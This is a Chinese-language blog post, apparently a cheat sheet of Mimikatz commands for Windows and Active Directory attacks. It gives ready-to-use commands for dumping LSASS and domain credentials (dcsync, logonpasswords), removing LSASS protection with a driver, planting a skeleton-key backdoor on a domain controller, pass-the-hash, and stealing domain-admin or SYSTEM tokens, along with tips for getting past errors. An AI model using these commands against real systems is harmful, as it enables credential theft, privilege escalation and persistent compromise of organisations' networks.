Mimikatz各模块基本用法

privilege::debug

****获得系统权限,优先运行该命令

Lsadump 与LSA交互

lsadump::dcsync /user:用户名或sid,向DC要一个号的密码 ,/all就是要全部的
/domain域名,不填默认为当前域
lsadump::LSA 导出全部凭证,需管理员身份
/inject - 注入 LSASS 进程提取凭证数据,/patch - 补丁 LSASS 进程
/id - 目标用户账户的 RID, /name - 目标用户账户的帐户名称
//RID为502的帐户是KRBTGT帐户,RID为500的帐户是默认的域管理员账户。

Bypass lsass protection

lsadump::lsa /patch 报错 ERROR kuhl_m_misc_skeleton; OpenProcess (0x00000005)

mimikatz在配置有miidrv.sys时可以绕过:

privilege::debug
!+
!processprotect /process:lsass.exe /remove
misc::skeleton

misc 杂项

misc::cmd 开一个命令行
misc::taskmgr 开一个任务管理器
misc::regedit 开一个注册表编辑器
//这三个命令在管理员禁止使用这三个东西的时候可以硬开出来

misc::addsid 将用户账户添加到SIDHistory中,第一个参数为目标账户,第二个值为SID(或账户/组名称)

misc::skeleton 在DC上运行,将skeleton密钥注入到LSASS进程中,维持权限常用手段
使得所有用户可以用skeleton key代替原有密码进行身份验证,相当于所有用户多了个额外密码
默认注入密码为mimikatz ,DC重启后失效

net 信息收集命令

net::user, net::wsession, net::group

process 进程相关

process::list 列出进程
process::resume /pid:  恢复一个进程,start  启动~,stop  结束~,suspend  挂起~

sekurlsa 与内存交互

sekurlsa::backupkeys 获得备份主密钥(不设置为一串0)
sekurlsa::credman 列出凭证管理器
sekurlsa::dpapi 列出已缓存的主密钥(实际运行和上个命令的结果一致)
sekurlsa::dpapisystem 输出DPAPI_SYSTEM密文(密钥?)原文为secret
# 通过Dpapi获取Windows身份凭证:[<https://xz.aliyun.com/t/6508>](<https://xz.aliyun.com/t/6508>)
sekurlsa::ekeys 列出kerberos加密密钥
# 上面的貌似没啥用
sekurlsa::kerberos 列出所有登录用户的kerberos凭证(包括服务和电脑账户)
sekurlsa::krbtgt 获取krbtgt的全部凭证(DC上运行)
sekurlsa::logonpasswords 列出所有可用的凭证(和明文密码)
sekurlsa::minidump + path 上下文切换到lsass转储文件
sekurlsa::process 上下文切换回lsass进程
sekurlsa::msv 列出LM和NTLM凭证
sekurlsa::pth /user /domain:目标ip /rc4 or /ntlm /run(默认为cmd)  哈希传递
sekurlsa::tickets 列出最近所有经过身份验证的用户的可用的 Kerberos 票证,包括使用用户帐户的上下文运行的服务和本地计算机在 AD 中的计算机帐户。

logonpasswords 报错 ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)
转储lsass.dmp到路径,# sekurlsa::minidump 路径/lsass.dmp , # sekurlsa::logonPasswords

token 交互、抓取、假冒Windows令牌

token::list 列出所有令牌
token::whoami 显示当前身份

token::elevate 提升至system权限
/id:指定目标token的TokenID
/domainadmin:窃取域管的token(之后可执行lsadump::dcsync等)
/enterpriseadmin:窃取企业管理员的token
/admin:窃取本地管理员的token
/localservice:窃取Local Service权限的token
/networkservice:窃取Network Service权限的token
/system:窃取SYSTEM权限的token

Kerberos 域相关

Golden Tickets
Silver Tickets
Trust Tickets
kerberos::ptt

原文:https://blog.z3ratu1.cn/Mimikatz使用简略.htmlmimikatz简单使用手册 | Z3ratu1's bloghttps://blog.z3ratu1.cn/Mimikatz使用简略.html

官网:Mimikatz – Active Directory Security

手册:https://wooyun.js.org/drops/Mimikatz 非官方指南和命令参考_Part3.html 

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值